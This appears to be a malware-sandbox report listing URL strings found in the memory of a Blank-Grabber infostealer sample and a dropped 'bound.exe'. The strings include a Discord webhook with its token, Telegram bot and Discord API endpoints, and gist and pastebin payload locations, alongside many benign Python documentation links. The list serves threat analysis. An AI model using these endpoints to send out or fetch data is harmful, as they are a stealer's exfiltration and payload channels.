                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blank-8RmNx.in
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1299279521836433439/GoUGaI0qQnNvUez_tVUOCPj55nOrj_OQnwDZRVe4JnsR8fW
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460347601.000001DCB5A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1398382471.000001DCB5623000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6B4A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/api/endpoint.json
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/asset/discord.json
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr#
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1406140672.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404697501.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404952130.000001DCB6036000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1405277736.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5D21000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5DAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408120431.000001DCB5E6F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB63B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412628978.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/29200
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E57000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C19000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C15000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462110032.000001DCB6130000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pjseRvyK
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1396701791.000001DCB55F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409064610.000001DCB5E95000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E57000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
